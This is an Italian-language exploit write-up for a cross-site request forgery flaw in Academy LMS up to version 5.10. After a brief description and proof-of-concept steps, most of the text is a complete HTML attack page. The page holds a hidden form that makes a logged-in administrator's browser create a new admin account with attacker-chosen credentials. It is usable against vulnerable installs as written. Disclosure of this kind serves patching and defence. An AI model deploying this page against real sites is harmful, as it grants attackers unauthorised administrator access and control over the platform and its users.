
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS è un'applicazione in cui gli utenti possono creare e pubblicizzare corsi. La funzionalità che consente di aggiungere un nuovo utente amministratore è vulnerabile a CSRF, rendendo possibile l'uso dell'ingegneria sociale per ottenere l'accesso come amministratore sulla piattaforma.
#Prova di concetto (POC) Il primo passo della nostra prova di concetto consiste nell'autenticarsi alla piattaforma con un utente amministratore.
Successivamente, è sufficiente accedere alla pagina che contiene il codice per sfruttare la vulnerabilità e osservare che un nuovo utente amministratore è stato aggiunto al sistema.
Codice utilizzato nell'exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>